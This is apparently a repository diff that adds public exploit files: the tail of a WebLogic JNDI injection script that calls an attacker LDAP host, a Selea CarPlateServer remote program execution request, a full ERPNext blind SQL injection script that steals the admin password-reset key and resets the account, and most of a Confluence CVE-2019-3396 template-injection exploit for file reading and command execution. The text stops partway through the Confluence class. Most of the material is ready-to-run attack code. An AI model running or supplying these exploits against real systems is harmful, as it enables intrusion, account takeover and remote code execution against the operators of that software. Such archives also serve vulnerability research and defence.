sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
if bVerbose: print('[!] Using URL ' + sFullUrl)
oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
oResponse = oOpener.open(oRequest, timeout = iTimeout)
time.sleep(5)
bExploitWorked = False
for line in oRun.stdout:
if 'Log a request' in line: bExploitWorked = True
if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
if bVerbose: print(oRun.stderr)
endIt()
if __name__ == "__main__":
try: main()
except KeyboardInterrupt: endIt()

286
exploits/multiple/webapps/49452.txt Normal file
View file

@ -0,0 +1,286 @@
# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution
# Date: 08.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: 4.0.1.6(210120)
4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: Our CPS (Car Plate Server) software is an advanced solution that can
be installed on computers and servers and used as an operations centre. It can
create sophisticated traffic control and road safety systems connecting to
stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert
notifications directly to tablets or smartphones, it can receive and transfer
data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution
that offers full integration with main video surveillance software. Our CPS
software connects to the national operations centre and provides law enforcement
authorities with necessary tools to issue alerts. CPS is designed to guarantee
cooperation among different law enforcement agencies. It allows to create a
multi-user environment that manages different hierarchy levels and the related
division of competences.
Desc: The server suffers from an arbitrary win32/64 binary executable execution
when setting the NO_LIST_EXE_PATH variable to a program of choice. The command
will be executed if proper trigger criteria is met. It can be exploited via CSRF
or by navigating to /cps/ endpoint from the camera IP and bypass authentication
gaining the ability to modify the running configuration including changing the
password of admin and other users.
Tested on: Microsoft Windows 10 Enterprise
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5622
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php
08.11.2020
--
POST /config_request?ACTION=WRITE HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 6309
Authorization: Basic ZmFrZTpmYWtl
Accept: application/json, text/plain, */*
LoginMode: angular
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75
AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a
content-type: application/json
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
{
"ACTIONS": {
"ANIA_LIST_DAYS_NUM": "15",
"ANIA_LIST_PWD": "",
"ANIA_LIST_USER": "{B64valuehereommited}",
"BLACK_LIST_COUNTRY": "",
"EXACT_MATCH": "false",
"FUZZY_MATCH": "true",
"MINISTEROTRASPORTI_LIST_DAYS_NUM": "15",
"MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1",
"MINISTEROTRASPORTI_LIST_GET_OWNERS": "false",
"MINISTEROTRASPORTI_LIST_PWD": "",
"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false",
"MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false",
"MINISTEROTRASPORTI_LIST_USER": "",
"MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false",
"MINISTEROTRASPORTI_LIST_USE_VPN": "true",
"MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "",
"MINISTEROTRASPORTI_LIST_VPN_USERNAME": "",
"MINISTERO_LIST_DAYS_NUM": "24",
"MINISTERO_LIST_PWD": "",
"MINISTERO_LIST_USER": "",
"NO_LIST_ENABLED": "true",
"NO_LIST_ENABLE_EXE": "true",
"NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe",
"NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR",
"NO_LIST_HTTP_ENABLED": "false",
"NO_LIST_SEND_TCP_ALARM": "",
"PERMISSIVE_MATCH": "true",
"WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": ""
},
"CAMERAINFO": {
"BA__________": {
"APPROACHING": "",
"CustomCameraId": "",
"CustomGateId": "",
"DetectDesc": "ZSL",
"DetectId": "",
"Direction": "",
"GPSLocation": "",
"GateDesc": "3",
"GateId": "",
"LEAVING": "",
"ZoneName": "",
"setname": "false",
"skip": "false"
}
},
"CONTEXT": {
"BA__________": {
"URL": [
"https://www.zeroscience.mk"
]
}
},
"DBMS": {
"DB_NAME": "",
"DB_PASSWORD": "",
"DB_SERVER": "",
"DB_TYPE": "sqlite",
"DB_USERNAME": "",
"ENCRYPT_DB": "false",
"SQLITE_MAX_MB_RAM_CACHE": "-1"
},
"EMAIL": {
"DEST": "",
"FROM_EMAIL": "",
"FROM_NAME": "",
"LOG_USER_SEARCH": "false",
"MIN_EMAIL_TIME": "5",
"PASSWORD": "",
"PORT": "25",
"SEND_EMAIL_ON_TAMPER": "false",
"SERVER": "",
"SSL": "false",
"USERNAME": "",
"XOAUTH2": "false"
},
"EMAIL-XOAUTH2": {
"refresh_token": ""
},
"EZ_CLIENTS": {
"PASSWORD": "",
"SLAVES": "",
"USERNAME": "",
"USE_CNTLM": "false",
"WANT_CTX": "false"
},
"EZ_CLIENT_SCNTT": {
"CTX": "true",
"HOST": "",
"PASSWORD": "",
"PORT": "443",
"USERNAME": ""
},
"FTPSYNC": {
"DELETE_OLD_SYNC_DAYS": "7",
"JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==",
"SAVE_FTP_SEND_ERRORS": "true"
},
"GLOBAL_HTTP_PROXY": {
"CNTLM_ENABLED": "false",
"EZ_ADDRESS": "cps.selea.com",
"EZ_PORT": "8999",
"HOST": "",
"NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+",
"PASSWORD": "",
"PORT": "",
"PROXY_ENABLED": "true",
"USERNAME": ""
},
"HTTPS": {
"CERTIFICATE": "",
"ENABLE_HTTP2": "true",
"GET_CERTIFICATE_FROM_SELEA": "false",
"PRIVATE_KEY": "",
"ROOT_CERTIFICATE": ""
},
"MASTER_CPS": {
"ENABLED": "true",
"MASTERS": "",
"PASSWORD": "",
"USERNAME": ""
},
"PROXY_TCP": {
"ENABLED": "false",
"USE_HTTP_PROXY": "false"
},
"REMOTE_LIST": {
"ADDRESS": "",
"ENABLED": "false",
"PASSWORD": "",
"PORT": "",
"USERNAME": ""
},
"REPORT": {
"STATS_AGGREGATE": "true",
"STATS_ENABLED": "false",
"STATS_FREQ": "MONTH",
"STATS_PATH": "",
"STATS_SELECTED": "",
"STATS_WEEK_DAY": "Mon"
},
"SCNTT": {
"LIST_A1_DAYS_LIMIT": "0",
"SCNTT_PASSWORD": "",
"SCNTT_PRIV_KEY_FILENAME": "",
"SCNTT_PUB_CERT": "",
"SCNTT_SYSTEM_DESC": "",
"SCNTT_SYSTEM_ID": "",
"SCNTT_USERNAME": ""
},
"SETTINGS": {
"ALLOW_FLASH_NOTIFICATIONS": "true",
"AUTO_UPDATE": "true",
"BACKUP_AT_SPECIFIC_HOUR": "-1",
"BACKUP_DB_PATH": "",
"BACKUP_EVERY_HOURS": "0",
"CARPLATE_DETAILS_ENABLED": "false",
"CHECK_EXPIRING_CARPLATES": "false",
"CHECK_EXPIRING_CARPLATES_DAYS": "7",
"CHECK_FILENAME_SYNTAX": "true",
"DB_DELETE_DAYS": "90",
"DB_DELETE_ENABLE": "false",
"DB_DELETE_LOG_DAYS": "7",
"DB_DELETE_OCR_FILE": "90",
"DB_STATS_DELETE_DAYS": "90",
"DISABLE_WHITELIST_REMOTE_DB_CHECK": "false",
"ENCRYPT_IMAGES": "false",
"FREE_DISK_LIMIT": "1000",
"FRIENDLY_NAME": "test",
"FTP_CUSTOM_PORT_RANGE": "false",
"FTP_DOWNLOAD_DISABLED": "true",
"FTP_ENABLED": "true",
"FTP_EXTERN_IP": "",
"FTP_EXTERN_IP_AUTO": "false",
"FTP_LIST_DIR_DISABLED": "true",
"FTP_MAX_PORT": "0",
"FTP_MIN_PORT": "0",
"FTP_PORT": "21",
"FTP_USERS": "",
"FTP_USE_FTPS": "true",
"HTTP2_PORT": "8081",
"HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU",
"HTTP_PORT": "8080",
"HTTP_USERNAME": "admin",
"IGNORE_CONTEXT_FOR_UNREADFAKE": "false",
"IGNORE_IF_NOT_SYNTAX_MATCH": "false",
"MILESTONE_CONNECTIONS": "5",
"MILESTONE_ENABLED": "true",
"MILESTONE_ENABLE_ACTIVE_CONNECTION": "false",
"MILESTONE_PORT": "5666",
"MILESTON_REMOTE_IP": "",
"MILESTON_REMOTE_PORT": "8080",
"MIN_LOG_LEVEL": "0",
"PERIODIC_BACKUP_CONFIG": "0",
"REMOVE_BLACK_LIST_ON_EXPIRE": "true",
"REMOVE_NON_ALARM_CARPLATE": "false",
"REMOVE_WHITE_LIST_ON_EXPIRE": "true",
"SAVE_GATEWAY_SEND_ERRORS": "true",
"SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7",
"SEND_EMAIL_ON_LOST_CONNECTION": "false",
"SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600",
"SEND_EMAIL_ON_NO_PLATE_READ": "false",
"SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12",
"SERVER_NTP_ON": "false",
"SERVER_NTP_PORT": "123",
"USE_HTTPS": "false"
},
"VPNC": {
"VPN_NET_NAME": ""
},
"TCP_TEMPLATES": []
}

280
exploits/multiple/webapps/49464.py Executable file
View file

@ -0,0 +1,280 @@
# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
# Date: 21-01-21
# Exploit Author: Hodorsec
# Vendor Homepage: http://erpnext.org
# Software Link: https://erpnext.org/download
# Version: 12.14.0
# Tested on: Ubuntu 18.04
#!/usr/bin/python3
# AUTHENTICATED SQL INJECTION VULNERABILITY
# In short:
# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
#
# Longer story:
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
# Test environment:
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
# Cause:
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.
# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
# 1. Create account
# 1.a. Use update-password link for created user received via mail
# STEPS INCLUDED IN SCRIPT
# 1. Login using existing low-privileged account
# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
# 3. Retrieve reset key for admin user
# 4. Reset admin account using given password
# DEMONSTRATION
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2
# [*] Got an authenticated session, continue to perform SQL injection...
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
# admin@nowhere.local
# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1
# [*] Sent reset request for 'admin@nowhere.local
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!
#
# [+] Done!
import requests
import urllib3
import os
import sys
import re
# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set timeout
timeout = 30
# Injection prefix and suffix
inj_prefix = "[\"select(sleep("
inj_suffix = "))))\"]"
# Decimal begin and end
dec_begin = 48
dec_end = 57
# ASCII char begin and end
ascii_begin = 32
ascii_end = 126
# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")
exit(0)
# Custom headers
def http_headers():
headers = {
'User-Agent': "Mozilla",
}
return headers
# Get an authenticated session
def get_session(url,headers,email,password):
data = {'cmd':'login',
'usr':email,
'pwd':password,
'device':'desktop'}
session = requests.session()
r = session.post(url,headers=headers,data=data,timeout=timeout,=
allow_redirects=True,verify=False)
if "full_name" in r.text:
return session
else:
print("[!] Unable to get an authenticated session, check credentials...")
exit(-1)
# Perform the SQLi call for injection
def sqli(url,session,headers,inj_str,sleep):
comment_inj_str = re.sub(" ","+",inj_str)
inj_params = {'cmd':'frappe.model.db_query.get_list',
'filters':'["idx=1"]',
'or_filters':inj_str,
'fields':'idx',
'doctype':'Report',
'order_by':'idx',
'group_by':'idx'}
# inj_params[param] = comment_inj_str
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
ms.items())
=20
# Do GET
r = session.get(url,params=inj_params,headers=headers,timeout=t=
imeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)
# Loop through positions and characters
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
extracted = ""
max_pos_len = 35
# Loop through length of string
# Not very efficient, should use a guessing algorithm
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
+ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
if not sqli(url,session,headers,inj_str,sleep):
break
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
if sqli(url,session,headers,inj_str,sleep):
extracted += chr(guess)
print(extracted_char,end='',flush=True)
break
return extracted
def forgot_password(url,headers,sqli_email):
data = {'cmd':'frappe.core.doctype.user.user.reset_password',
'user':sqli_email}
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if "Password reset instructions have been sent to your email" in r.text=
:
return r
def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
data = {'key':sqli_reset_key,
'old_password':'',
'new_password':new_password,
'logout_all_sessions':'0',
'cmd':'frappe.core.doctype.user.user.update_password'}
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if r.status_code == 200:
return r
# Main
def main(argv):
if len(sys.argv) == 7:
email = sys.argv[1]
password = sys.argv[2]
username = sys.argv[3]
new_password = sys.argv[4]
url = sys.argv[5]
sleep = int(sys.argv[6])
else:
print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
exit(0)
# Random headers
headers = http_headers()
# Sleep divide by 2 due to timing caused by specific DBMS query
sleep = sleep / 2
# Optional prefix / suffix
prefix = ""
suffix = ""
# Tables / columns / values
table = 'tabUser'
columns = ['name','reset_password_key']
sqli_email = ""
sqli_reset_key = ""
# Rows
rows = 1
# Do stuff
try:
# Get an authenticated session
session = get_session(url,headers,email,password)
if session:
print("[*] Got an authenticated session, continue to perform SQL injection...")
=20
# Getting values for found rows in specified columns
for column in columns:
print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
for row in range(0,rows):
retrieved = get_data(url,session,headers,prefix,suffix,ro=
w,column,table,username,sleep)
print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
if column == 'name':
sqli_email = retrieved
# Generate a reset token in database
if forgot_password(url,headers,sqli_email):
print("[*] Sent reset request for '" + sqli_email + "'"=
)
else:
print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
exit(-1)
elif column == 'reset_password_key':
sqli_reset_key = retrieved
# Print retrieved values
print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
sqli_reset_key + "'")
# Reset the desired account
if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
):
print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
else:
print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
exit(-1)
=20
# Done
print("\n[+] Done!\n")
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "\n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
exit(-1)
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
main(sys.argv[1:])
# Timeline:
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
# 21-01-21: No response received, public disclosure

778
exploits/multiple/webapps/49465.py Executable file
View file

@ -0,0 +1,778 @@
# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI
# Date: 21-Jan-2021
# Exploit Author: 46o60
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
# Version: 6.12.1
# Tested on: Ubuntu 20.04.1 LTS
# CVE : CVE-2019-3396
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian
Confluence Server server-side template injection.
Vulnerability information:
Authors:
Daniil Dmitriev - Discovering vulnerability
Dmitry (rrock) Shchannikov - Metasploit module
Exploit
ExploitDB:
https://www.exploit-db.com/exploits/46731
Metasploit
https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/
exploit/multi/http/confluence_widget_connector
While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made
from the target Confluence server towards attacker's server where the Velocity template with the payload is being
hosted. If this is not possible, for example, because network where the target Confluence server is located filters all
outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this
alternative approach by first uploading the template to the server and then loading it with original vulnerability from
local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any
user can upload a file to the server by attaching the file to his "personal space".
There are two modes of the exploit:
1. Exploiting path traversal for file disclosure and directory listings.
2. RCE by uploading a template file with payload to the server.
In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged
user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode
of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path
is pointing to. As in original exploit no authentication is needed for this mode.
Limitations of path traversal exploit:
- not possible to distinguish between non-existent path and lack of permissions
- no distinction between files and directories in the output
If you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A
regular user probably has enough privileges for this since each user can have their own personal space where they
should be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not
exists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file
with payload from local filesystem instead from remote system.
Prerequisite of RCE in this exploit:
- authenticated session is needed
- knowledge of where attached files are stored on the file system - if it is not default location then use first mode
to find it, should be in Confluence install directory under ./attachments subdirectory
Usage
- list /etc folder on Confluence server hosted on http://confluence.example.com
python exploit.py -th confluence.example.com fs /etc
- get content of /etc/passwd on same server but through a proxy
python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd
- execute 'whoami' command on the same server (this will upload a template file with payload to the server using
existing session)
python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami"
Tested on Confluence versions:
6.12.1
To test the exploit:
1. Download Confluence trial version for version 6.12.1
https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser
network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and
change the version in URL to be 6.12.1)
SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin
2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default.
chmod +x atlassian-confluence-6.12.1-x64.bin
sudo ./atlassian-confluence-6.12.1-x64.bin
3. Open the browser to configure initial installation, when you get to license window copy the server ID.
4. Create account at https://my.atlassian.com/ and request for new trial license using server ID.
5. Activate the license and finish the installation with default options.
6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the
exploit.
7. Run the exploit (see usage above).
"""
__version__ = "1.0.0"
__author__ = "46o60"
import argparse
import logging
import requests
import urllib3
from bs4 import BeautifulSoup
import re
import json
import random
import string
# script and banner
SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script"
ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____
| | | |\ | |___ | | | |___ |\ | | | | |__/
|___ |__| | \| | |___ |__| |___ | \| |___ |__| | \
"""
# turn off requests log output
urllib3.disable_warnings()
logging.getLogger("urllib3").setLevel(logging.WARNING)
def print_banner():
"""
Prints script ASCII banner and basic information.
Because it is cool.
"""
print(ASCII_BANNER_TEXT)
print("{} v{}".format(SCRIPT_NAME, __version__))
print("Author: {}".format(__author__))
print()
def exit_log(logger, message):
"""
Utility function to log exit message and finish the script.
"""
logger.error(message)
exit(1)
def check_cookie_format(value):
"""
Checks if value is in format: ^[^=]+=[^=]+$
"""
pattern = r"^[^=]+=[^=]+$"
if not re.match(pattern, value):
raise argparse.ArgumentTypeError("provided cookie string does not have correct format")
return value
def parse_arguments():
"""
Performs parsing of script arguments.
"""
# creating parser
parser = argparse.ArgumentParser(
prog=SCRIPT_NAME,
description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload."
)
# general script arguments
parser.add_argument(
"-V", "--version",
help="displays the current version of the script",
action="version",
version="{name} {version}".format(name=SCRIPT_NAME, version=__version__)
)
parser.add_argument(
"-v", "--verbosity",
help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity",
action="count",
default=0
)
parser.add_argument(
"-sb", "--skip-banner",
help="skips printing of the banner",
action="store_true",
default=False
)
parser.add_argument(
"-s", "--silent",
help="do not output results of the exploit to standard output",
action="store_true",
default=False
)
parser.add_argument(
"-q", "--quiet",
help="do not output any logs",
action="store_true",
default=False
)
# arguments for input
parser.add_argument(
"-px", "--proxy",
help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS"
)
parser.add_argument(
"-t", "--tls",
help="use HTTPS protocol, default behaviour is to use plain HTTP",
action="store_true"
)
parser.add_argument(
"-th", "--target-host",
help="target hostname/domain",
required=True
)
parser.add_argument(
"-p", "--port",
help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS"
)
# two different sub commands
subparsers = parser.add_subparsers(
title="actions",
description="different behaviours of the script",
help="for detail description of available action options invoke -h for each individual action",
dest="action"
)
# only exploring file system by disclosure of files and directories
parser_file_system = subparsers.add_parser(
"fs",
help="use the exploit to browse local file system on the target endpoint"
)
parser_file_system.add_argument(
"path",
help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"
)
parser_file_system.set_defaults(func=exploit_path_traversal)
# using file upload to deploy payload and achieve RCE
parser_rce = subparsers.add_parser(
"rce",
help="use the exploit to upload a template "
)
parser_rce.add_argument(
"-hd", "--home-directory",
help="Confluence home directory on the server"
)
parser_rce.add_argument(
"-c", "--cookie",
help="cookie that should be used for the session, value passed as it is in HTTP request, for example: "
"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB",
type=check_cookie_format,
required=True
)
parser_rce.add_argument(
"command",
help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"
)
parser_rce.set_defaults(func=exploit_rce)
# parsing
arguments = parser.parse_args()
return arguments
class Configuration:
"""
Represents all supported configuration items.
"""
# Parse arguments and set all configuration variables
def __init__(self, script_args):
self.script_arguments = script_args
# setting input arguments
self._proxy = self.script_arguments.proxy
self._target_protocol = "https" if self.script_arguments.tls else "http"
self._target_host = self.script_arguments.target_host
self._target_port = self.script_arguments.port if self.script_arguments.port else \
443 if self.script_arguments.tls else 80
@staticmethod
def get_logger(verbosity):
"""
Prepares logger to output to stdout with appropriate verbosity.
"""
logger = logging.getLogger()
# default logging level
logger.setLevel(logging.DEBUG)
# Definition of logging to console
ch = logging.StreamHandler()
# specific logging level for console
if verbosity == 0:
ch.setLevel(logging.INFO)
elif verbosity > 0:
ch.setLevel(logging.DEBUG)
# formatting
class MyFormatter(logging.Formatter):
default_fmt = logging.Formatter('[?] %(message)s')
info_fmt = logging.Formatter('[+] %(message)s')
error_fmt = logging.Formatter('[-] %(message)s')
warning_fmt = logging.Formatter('[!] %(message)s')
debug_fmt = logging.Formatter('>>> %(message)s')
def format(self, record):
if record.levelno == logging.INFO:
return self.info_fmt.format(record)
elif record.levelno == logging.ERROR:
return self.error_fmt.format(record)
elif record.levelno == logging.WARNING:
return self.warning_fmt.format(record)
elif record.levelno == logging.DEBUG:
return self.debug_fmt.format(record)
else:
return self.default_fmt.format(record)
ch.setFormatter(MyFormatter())
# adding handler
logger.addHandler(ch)
return logger
# Properties
@property
def endpoint(self):
if not self._target_protocol or not self._target_host or not self._target_port:
exit_log(log, "failed to generate endpoint URL")
return f"{self._target_protocol}://{self._target_host}:{self._target_port}"
@property
def remote_path(self):
return self.script_arguments.path
@property
def attachment_dir(self):
home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \
Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR
return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}"
@property
def rce_command(self):
return self.script_arguments.command
@property
def session_cookie(self):
if not self.script_arguments.cookie:
return None
parts = self.script_arguments.cookie.split("=")
return {
parts[0]: parts[1]
}
@property
def proxies(self):
return {
"http": self._proxy,
"https": self._proxy
}
class Exploit:
"""
This class represents actual exploit towards the target Confluence server.
"""
# used for both path traversal and RCE
DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview"
# used only for RCE
CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space"
PERSONAL_SPACE_KEY_PATH = "/index.action"
PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$"
PERSONAL_SPACE_ID_PATH = "/rest/api/space"
PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey"
HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$"
ATL_TOKEN_PATH = "/pages/viewpageattachments.action"
FILE_UPLOAD_PATH = "/pages/doattachfile.action"
# file name has no real significance, file is identified on file system by it's ID
# (change only if you want to avoid detection)
DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format(
''.join(random.choice(string.ascii_lowercase) for i in range(5))
) # the extension .vm is not really needed, remove it if you have problems uploading the template
DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence"
DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003"
# using random name for uploaded file so it will always be first version of the file
DEFAULT_FILE_VERSION = "1"
def __init__(self, config):
"""
Runs the exploit towards target_url.
"""
self._config = config
self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}"
if self._config.script_arguments.action == "rce":
self._root_url = f"{self._config.endpoint}/"
